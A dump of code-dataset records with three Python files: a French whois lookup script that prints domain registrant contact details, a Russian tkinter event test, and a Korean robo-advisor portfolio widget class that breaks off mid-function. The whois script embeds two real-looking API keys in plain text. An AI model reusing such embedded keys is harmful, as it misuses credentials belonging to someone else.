██╗███████╗\n ██║ ██║██║ ██║██╔═══██╗██║██╔════╝\n ██║ █╗ ██║███████║██║ ██║██║███████╗\n ██║███╗██║██╔══██║██║ ██║██║╚════██║\n ╚███╔███╔╝██║ ██║╚██████╔╝██║███████║\n ╚══╝╚══╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝╚══════╝\n Author -> Mizaru/Yaniss \n @sMizaru https://github.com/sMizaru \n\n\n ''')\n \n#L'API n'est pas au point\n#def googlemaps(loc):\n# URL = \"http://maps.googleapis.com/maps/api/geocode/json\"\n# rq = requests.get(URL, dict(address=loc, key='AIzaSyDFeso0skYK4ZAb-qLHhyNESp7CHdgG33U'))\n# if rq.status_code == 200:\n# data = rq.json() \n# latitude = data['results'][0]['geometry']['location']['lat'] \n# longitude = data['results'][0]['geometry']['location']['lng'] \n# formatted_address = data['results'][0]['formatted_address']\n# print(\"Latitude -> %s\" % latitude)\n# print(\"Longitude -> %s\" % longitude)\n# print('Adresse -> %s' % formatted_address)\n# else:\n# raise Exception('lol, je crois que jai reçu un code de status inconnu %d' % rq.status_code) #Si la reponse contient un status autre que 200 (success)\n# sys.exit(1)\n\n\n#Création de la requête vers l'API\ndef request(domain, apikey):\n\n r = requests.get('http://api.whoapi.com/', dict(domain=domain, r='whois', apikey=apikey)) #Initialisation de la requête GET vers l'API (get > post c'est tout)\n if r.status_code == 200:\n json = r.json()\n if int(json['status']) == 0:\n nameserver = json['nameservers']\n whois_name = json['whois_name']\n info = json['contacts']\n organization = json['contacts'][0]['organization']\n email = json['contacts'][0]['email']\n phone = json['contacts'][0]['phone']\n domain_name = json['domain_name']\n address = json['contacts'][0]['full_address']\n if not email:\n print('Nom -> %s' % whois_name)\n print('Informations sur le propriétaire -> %s' % info)\n print('Nom de domaine -> %s' % domain_name)\n print('Entreprise -> %s' % organization)\n print(\"Il n'y a pas d'adresse e-mail spécifiée\")\n print('Nameservers -> %s' % nameserver)\n print('Adresse -> %s' % address)\n #googlemaps(address)\n else:\n print('Nom -> %s' % whois_name)\n print('Informations sur le propriétaire -> %s' % info)\n print('Nom de domaine -> %s' % domain_name)\n print('Entreprise -> %s' % organization)\n print('Adresse e-mail -> %s' % email)\n print('Nameservers -> %s' % nameserver)\n print('Adresse -> %s' % address)\n #googlemaps(address)\n else:\n raise Exception(json['status_desc'])\n sys.exit(1)\n else:\n raise Exception('lol, je crois que jai reçu un code de status inconnu %d' % r.status_code) #Si la reponse contient un status autre que 200 (success)\n sys.exit(1)\n\n\n#Creation de \"main\"\ndef main():\n host = raw_input('Quel est le domaine que tu veux whois ? Dit-moi tout -> ')\n target = str(host)\n request(target, 'b8453d3125f32d3042b11ebc2502aad0') #Le programme effectuera une requête vers le domaine qu'on aura precisé\n\nif __name__ == \"__main__\":\n banner()\n main() #appel vers la fonction main\n\n","sub_path":"whois.py","file_name":"whois.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"267288601","text":"import tkinter as tk\nimport time\n\n'''Константы'''\nWIDTH = 800\nHIGHT = 600\n\nroot = tk.Tk()\nfr = tk.Frame(root)\nroot.geometry(str(WIDTH) + 'x' + str(HIGHT))\ncanv = tk.Canvas(root, bg='white')\ncanv.pack(fill=tk.BOTH, expand=1)\nbutton_state = 0\n\ndef motion_move(event):\n print(event.x)\n\ndef press_button(event):\n global button_state\n button_state = 1\n index = 0\n while button_state:\n canv.update()\n index += 1\n print('press_button=', button_state, 'Время ожидание событие release_button=', index )\n time.sleep(1)\n\ndef release_button(event):\n global button_state\n button_state = 0\n print('release_button=', button_state)\n\ncanv.bind('', motion_move)\ncanv.bind('', press_button)\ncanv.bind('', release_button)\n\ntk.mainloop()","sub_path":"python_practice_2020/Lab_8/event_test.py","file_name":"event_test.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"102807955","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom datetime import date\nimport time\nfrom tqdm import tqdm\n\nimport matplotlib.font_manager as fm\nimport matplotlib.pylab as plt\nimport matplotlib\n\nimport ipywidgets as widgets\nfrom ipywidgets import interact\nfrom PIL import Image, ImageFont, ImageDraw\nfrom IPython.display import clear_output\nfrom IPython.display import Image as disImage\nfrom IPython.display import display\n\nfrom .scraper import Scraper\nfrom .indicator import Indicator\nfrom .recommender import Recommender\n\n\nclass RED:\n def __init__(self):\n self.path = os.getcwd()\n self.stock_path = os.path.join(self.path, \"data/stock\")\n self.etf_path = os.path.join(self.path, \"data/etf\")\n self.users_path = os.path.join(self.path, \"data/users\")\n if not os.path.isdir(self.stock_path):\n os.makedirs(self.stock_path)\n if not os.path.isdir(self.etf_path):\n os.makedirs(self.etf_path)\n if not os.path.isdir(self.users_path):\n os.makedirs(self.users_path)\n\n try:\n self.total_info = pd.read_csv(\n self.path + \"/data/users/userDB.csv\", encoding=\"cp949\", index_col=0\n )\n except FileNotFoundError:\n print('\"userDB.csv\" 파일을 찾을 수 없습��다. 먼저 userDB를 생성하겠습니다.')\n df = pd.DataFrame(\n columns=(\n \"투자 금액(만 원)\",\n \"투자 기간\",\n \"나이\",\n \"성별\",\n \"월 정기 수입(만 원)\",\n \"관심산업분야\",\n \"금융지식수준\",\n \"위험추구성향\",\n \"주식\",\n \"채권\",\n \"ETF\",\n \"날짜\",\n )\n )\n df.to_csv(self.path + \"/data/users/userDB.csv\", encoding=\"cp949\")\n self.total_info = pd.read_csv(\n self.path + \"/data/users/userDB.csv\", encoding=\"cp949\", index_col=0\n )\n\n self.stock_data = os.listdir(self.path + \"/data/stock\")\n self.etf_data = os.listdir(self.path + \"/data/etf\")\n self.start = widgets.Button(description=\"투자 시작\")\n self.to_home_button = widgets.Button(description=\"뒤로 가기\")\n self.crawl_setting = widgets.Button(description=\"데이터 업데이트\")\n self.save = widgets.Button(description=\"결과 저장\")\n self.fontpath = self.path + \"/red/interface/font/NanumSquareB.ttf\"\n\n def RED_start(self, change):\n \"\"\" \"투자 시작\" 클릭시 다른 모든 함수들이 실행될 주요함수\"\"\"\n self.user_info = [\n RED.capital.value,\n RED.term_dropdown.value,\n RED.age.value,\n RED.gender_dropdown.value,\n RED.income.value,\n RED.sector.value,\n RED.know.value,\n RED.risk.value,\n ]\n clear_output()\n\n print(\"입력이 완료되었습니다, 투자자 성향을 판단중입니다\")\n print(\"···\")\n time.sleep(1.5)\n\n self.disposition_viz()\n # 성향을 보고 자본배분 비율 선정\n # 각각 추천 -> 주식: 기간, 알고리즘 고려 / etf: 기간, 수익률, 관심분야 고려\n self.portfolios = self.mk_portfolio()\n # 추천 결과 출력 후 DB 만들고 저장.\n display(self.save)\n self.save.on_click(self.save_info)\n\n def save_info(self, portfolios):\n df = pd.DataFrame(\n np.array(self.user_info).reshape(1, 8),\n columns=[\n \"투자 금액(만 원)\",\n \"투자 기간\",\n \"나이\",\n \"성별\",\n \"월 정기 수입(만 원)\",\n \"관심산업분야\",\n \"금융지식수준\",\n \"위험추구성향\",\n ],\n )\n\n df[\"주식\"] = [list(self.portfolios[0].items())]\n df[\"채권\"] = [list(self.portfolios[1].items())]\n df[\"ETF\"] = [list(self.portfolios[2].items())]\n df[\"날짜\"] = date.today()\n df = pd.concat([self.total_info, df], ignore_index=True)\n df.to_csv(self.path + \"/data/users/userDB.csv\", encoding=\"cp949\")\n print(\"저장되었습니다.\")\n\n def mk_portfolio(self):\n \"\"\"포트폴리오 만드는 함수, r1: ETF비율, r2 : 채권 비율\"\"\"\n capital = self.user_info[0] * 10000\n if self.user_info[7] == self.risk_list[0]:\n r1 = 1\n r2 = 0.67\n elif self.user_info[7] == self.risk_list[1]:\n r1 = 0.8\n r2 = 0.4\n elif self.user_info[7] == self.risk_list[2]:\n r1 = 0.6\n r2 = 0.3\n elif self.user_info[7] == self.risk_list[3]:\n r1 = 0.4\n r2 = 0.1\n elif self.user_info[7] == self.risk_list[4]:\n r1 = 0.2\n r2 = 0\n\n if self.user_info[1] == self.term_list[0] or self.user_info[1] == self.term_list[1]:\n r2 = 0 # 투자 기간이 짧으면 채권 제외\n\n real_r0 = int((1 - r1) * 100)\n real_r1 = int((r1 - r2) * 100)\n real_r2 = int(r2 * 100)\n\n recommender = Recommender(self.path, self.stock_path, self.etf_path, self.user_info[5])\n \n recommender.cal_weight()\n rec_stock_lst = recommender.rec_stock()\n \n df = pd.read_csv(self.path + \"/data/stock_list2.csv\", encoding = 'cp949')\n names = [i[0] for i in rec_stock_lst]\n a = list(df[df['종목명'].isin(names)][['종목명','가중치']].sort_values(by=\"가중치\",ascending = False).종목명.values)\n rec_stock_lst.sort(key=lambda x: a.index(x[0]))\n #print(rec_stock_lst)\n \n # 중복의 경우 처리필요\n \n res_etf1, res_etf2 = recommender.rec_etf()\n print(\"\\n\\n고객님의 포트폴리오입니다.\\n\")\n \n 주식리스트 = []\n 채권리스트 = []\n 일반리스트 = []\n\n 주식별금액리스트 = []\n 채권별금액리스트 = []\n 일반별금액리스트 = []\n\n self.portfolios1, penny1 = self.dist(capital, rec_stock_lst, 1 - (r1), 10)\n print(\"\\n주식 종목 : {}원\\n\".format(capital * (1 - r1) - penny1))\n for name, info in self.portfolios1.items():\n print(\"{}, {}개 매입. {} 전략. 현재가: {}\".format(name, info[0], info[1][1], info[1][0]))\n 주식리스트.append(name)\n 주식별금액리스트.append(info[1])\n\n self.portfolios2, penny2 = self.dist(capital + penny1, res_etf1, r2, 5)\n print(\"\\n채권 ETF 종목 : {}원\\n\".format((capital + penny1) * r2 - penny2))\n for name, info in self.portfolios2.items():\n print(\"{}, {}개 매입.기간 내 보유 권장. 현재가: {}\".format(name, info[0], info[1][0]))\n 채권리스트.append(name)\n 채권별금액리스트.append(info[1])\n\n self.portfolios3, penny3 = self.dist(capital + penny2, res_etf2, r1 - r2, 5)\n print(\"\\n일반 ETF 종목 : {}원\\n\".format((capital + penny2) * (r1 - r2) - penny3))\n for name, info in self.portfolios3.items():\n print(\"{}, {}개 매입. 20일 후 리밸런싱 권장. 현재가: {}\".format(name, info[0], info[1][0]))\n 일반리스트.append(name)\n 채권별금액리스트.append(info[1])\n \n # 포트폴리오 1번 보여주기\n self.portfolio_viz()\n\n ## 포트폴리오 상세정보\n 주식금액 = capital * (1 - r1) - penny1\n 채권금액 = (capital + penny1) * r2 - penny2\n 일반금액 = (capital + penny2) * (r1 - r2) - penny3\n\n # 막대 그래프 생성\n kindx = [\"주식\", \"일반 ETF\", \"채권 ETF\"]\n values = [주식금액, 일반금액, 채권금액]\n colors = [\"silver\", \"gold\", \"lightgray\"]\n\n fm.get_fontconfig_fonts()\n font_name = fm.FontProperties(fname=self.fontpath).get_name()\n plt.rc(\"font\", family= font_name, size=20)\n \n\n fig = plt.figure(figsize=(7, 7))\n plt.bar(kindx, values, width=0.6, color=colors, edgecolor=\"lightgray\")\n\n plt.savefig(self.path + \"/red/interface/image/portfolio/bar_chart.png\")\n plt.close()\n\n # 경로별 이미지 불러오기\n im_tend = Image.open(self.path + \"/red/interface/image/portfolio/red_3.png\")\n im_chart = Image.open(self.path + \"/red/interface/image/portfolio/bar_chart.png\")\n font = ImageFont.truetype(self.fontpath, 24)\n\n # 칼라 설정\n b, g, r, a = 0, 0, 0, 0\n\n # 이미지에 텍스트 삽입\n draw = ImageDraw.Draw(im_tend)\n \n if real_r0 == 80: # 80 : 20 : 00\n try : \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((635, 208.666), str(주식리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((635, 253), str(주식리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((635, 297.333), str(주식리스트[4]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((635, 341.666), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((635, 386), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n elif real_r0 == 60: # 60 : 30 : 10\n if real_r2 == 0:\n try: \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(주식리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(주식리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n else:\n try : \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(주식리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(주식리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(채권리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(채권리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n elif real_r0 == 40: # 40 : 30 : 30\n if real_r2 == 0:\n try : \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(주식리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(일반리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n else:\n try : \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(주식리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(채권리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(채권리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n elif real_r0 == 19: # 19 : 40 : 40\n if real_r2 == 0:\n try : \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(일반리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(일반리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[4]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n else:\n try : \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(채권리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(채권리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(채권리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n elif real_r0 == 0: # 0 : 33 : 67\n if real_r2 == 0:\n try : \n draw.text((635, 120), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(일반리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(일반리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(일반리스트[4]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n else:\n try : \n draw.text((635, 120), str(채권리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(채권리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(채권리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(일반리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n \n\n # 이미지에 파이차트 삽입\n im_tend.paste(im_chart, (30, 10))\n\n display(im_tend)\n\n # 마무리\n #portfolios4 = dict(portfolios1, **portfolios2)\n #portfolios4.update(portfolios3)\n return self.portfolios1,self.portfolios2,self.portfolios3\n\n def dist(self, capital, asset, pro, max_num):\n \"\"\"자본 배분 알고리즘 (자본, 리스트, 비율, 최대종류)\"\"\"\n limit = capital * pro # 최대 금액\n amount = 0 # 금액\n res = dict() # 포트폴리오\n\n while True:\n more = False # 더 넣을 값이 있는가?\n for i in range(len(asset)):\n if len(res) >= max_num and asset[i][0] not in res: # 최대 종류 수까지 담았다면\n break\n if limit >= amount + asset[i][1]: # 최대금액 미만이라면\n amount += asset[i][1]\n res.setdefault(asset[i][0], [0, asset[i][1:]])\n res[asset[i][0]][0] += 1\n more = True\n\n # 더 못 넣는다면\n if more == False:\n break\n # print(\"배분가능 금액 : \",limit,\"실제 배분금액 : \", amount)\n return res, limit - amount\n\n def data_setting(self, change): # 실시간 종목추천을 위한 최근 데이터 크롤링 및 전처리\n print(\"실시간 주가 데이터를 불러오는 중입니다... (약 5분~8분 소요)\")\n self.crawling_start()\n print(\"데이터를 처리합니다.\")\n time.sleep(1)\n self.preprocess_start()\n\n def clear_all(self, change):\n clear_output() # \"뒤로 가기\" 클릭시 인터페이스 종료\n\n def run(self): # 인터페이스 및 프로그램 실행\n\n for i in self.user_buttons:\n display(i)\n\n display(self.crawl_setting)\n display(self.start)\n display(self.to_home_button)\n print(\"데이터 업데이트를 하신 후, 입력하신 정보를 확인하시고 투자 시작을 눌러주세요.\")\n self.start.on_click(self.RED_start)\n self.to_home_button.on_click(self.clear_all)\n self.crawl_setting.on_click(self.data_setting)\n\n def crawling_start(self):\n scraper = Scraper()\n scraper.runAll()\n\n def preprocess_start(self):\n for i in tqdm(os.listdir(self.path + \"/data/stock\")):\n data_dir = self.path + \"/data/stock/\" + i\n stock_df = pd.read_csv(data_dir, index_col=0, encoding=\"cp949\")\n stock_preprocess = Indicator(stock_df)\n stock_preprocess.runAll()\n stock_df.to_csv(data_dir, encoding=\"cp949\")\n\n for i in tqdm(os.listdir(self.path + \"/data/etf\")):\n data_dir = self.path + \"/data/etf/\" + i\n etf_df = pd.read_csv(data_dir, index_col=0, encoding=\"cp949\")\n etf_preprocess = Indicator(etf_df)\n etf_preprocess.runAll()\n etf_df.to_csv(data_dir, encoding=\"cp949\")\n print(\"데이터 업데이트가 완료되었습니다.\")\n\n term_list = [\"1주 ~ 1개월\", \"1개월 ~ 6개월\", \"6개월 ~ 1년\", \"1년 이상\"]\n sector_list = ['건설','금융','기계','IT','운수창고','운수장비',\n '유통','의약','전기전자','철강금속','화학', '통신', '상관없음']\n know_list = [\n \"금융투자상품에 투자해 본 경험이 없음\",\n \"널리 알려진 금융투자 상품(주식, 채권 및 펀드 등)의 구조 및 위험을 일정 부분 이해하고 있음\",\n \"널리 알려진 금융투자 상품(주식, 채권 및 펀드 등)의 구조 및 위험을 깊이 있게 이해하고 있음\",\n \"파생상품을 포함한 대부분의 금융투자상품의 구조 및 위험을 이해하고 있음\",\n ]\n risk_list = [\n \"예금 또는 적금 수준의 수익률을 기대 / 투자원금의 손실을 원하지 않음\",\n \"투자원금의 손실 위험을 최소화하고, 안정적인 투자를 목표 / 예금ㆍ적금보다 높은 수익을 위해 단기적인 손실정도는 수용할 수 있고, 자산 중 일부를 위험자산에 투자할 의향이 있음\",\n \"예금ㆍ적금보다 높은 수익을 기대할 수 있다면 위험을 감수하고 투자할 의향이 있음\",\n \"투자원금의 보전보다 수익을 추구 / 투자자금의 대부분을 주식, 옵션 등의 위험자산에 투자할 의향이 있음\",\n \"시장 평균 수익률을 넘어서는 높은 수준의 투자 수익 추구 / 투자자금의 대부분을 주식, 옵션 등의 위험자산에투자할 의향이 있음\",\n ]\n\n style = {\"description_width\": \"initial\"}\n\n capital = widgets.BoundedIntText(\n min=1,\n max=10000,\n value=300,\n continuous_update=True,\n description=\"투자 금액(만 원)\",\n disabled=False,\n style=style,\n )\n term_dropdown = widgets.Dropdown(\n description=\"투자 기간 \", options=term_list, disabled=False, style=style\n )\n\n age = widgets.BoundedIntText(\n min=10, max=100, value=20, disabled=False, description=\"나이 (만)\", style=style\n )\n gender_dropdown = widgets.Dropdown(\n description=\"성별 \", options=[\"남\", \"여\"], disabled=False, style=style\n )\n\n income = widgets.FloatText(\n value=100, continuous_update=True, description=\"월 정기 수입(만 원)\", disabled=False, style=style\n )\n\n sector = widgets.Dropdown(\n options=sector_list,\n description=\"관심산업분야\",\n disabled=False,\n continuous_update=False,\n layout={\"width\": \"max-content\"},\n readout=True,\n style=style,\n )\n know = widgets.Dropdown(\n options=know_list,\n description=\"금융지식수준\",\n disabled=False,\n continuous_update=False,\n layout={\"width\": \"max-content\"},\n readout=True,\n style=style,\n )\n risk = widgets.Dropdown(\n options=risk_list,\n description=\"위험추구성향\",\n disabled=False,\n continuous_update=False,\n layout={\"width\": \"max-content\"},\n readout=True,\n style=style,\n )\n user_buttons = [capital, term_dropdown, age, gender_dropdown, income, sector, know, risk]\n\n def disposition_viz(self): # 투자 성향 시각화 및 정보확인\n\n # 경로\n folder_path = [\"age/age_\", \"period/\", \"sex/\", \"tend/\"]\n extension_path = \".png\"\n\n # 투자성향 파일명\n if self.user_info[7] == self.risk_list[0]:\n tend = \"info5\"\n elif self.user_info[7] == self.risk_list[1]:\n tend = \"info4\"\n elif self.user_info[7] == self.risk_list[2]:\n tend = \"info3\"\n elif self.user_info[7] == self.risk_list[3]:\n tend = \"info2\"\n elif self.user_info[7] == self.risk_list[4]:\n tend = \"info1\"\n\n # 경로별 이미��� 불러오기\n im_tend = Image.open(\n self.path + \"/red/interface/image/\" + folder_path[3] + tend + extension_path\n )\n font = ImageFont.truetype(self.fontpath, 22)\n\n # 칼라 설정\n b, g, r, a = 0, 0, 0, 0\n\n # 이미지에 텍스트 삽임\n draw = ImageDraw.Draw(im_tend)\n draw.text((162, 352), str(self.user_info[2]) + (\"세\"), font=font, fill=(b, g, r, a))\n draw.text((162, 391), str(self.user_info[3]) + (\"자\"), font=font, fill=(b, g, r, a))\n draw.text((202, 429.5), str(self.user_info[1]), font=font, fill=(b, g, r, a))\n draw.text((202, 467), str(self.user_info[0]) + (\"만원\"), font=font, fill=(b, g, r, a))\n draw.text((249.3, 506), str(self.user_info[5]), font=font, fill=(b, g, r, a))\n display(im_tend)\n\n def portfolio_viz(self):\n self.to_home_button.on_click(self.RED_start)\n \n if (self.user_info[6] == self.know_list[0]) or (self.user_info[6] == self.know_list[1]):\n danger = Image.open(self.path + \"/red/interface/image/portfolio/위험고지.png\")\n display(danger)\n \n # 관심 산업 상관관계 보여주기\n if self.user_info[5] == self.sector_list[0]:\n s1 = Image.open(self.path + \"/red/interface/image/industry/건설양.png\")\n s2 = Image.open(self.path + \"/red/interface/image/industry/건설음.png\")\n display(s1)\n display(s2)\n elif self.user_info[5] == self.sector_list[5]:\n s3 = Image.open(self.path + \"/red/interface/image/industry/운수장비음.png\")\n display(s3)\n elif self.user_info[5] == self.sector_list[7]:\n s4 = Image.open(self.path + \"/red/interface/image/industry/의약음.png\")\n display(s4)\n\n # 포트폴리오 비율\n capital = self.user_info[0] * 10000\n if self.user_info[7] == self.risk_list[0]:\n r1 = 1\n r2 = 0.67\n elif self.user_info[7] == 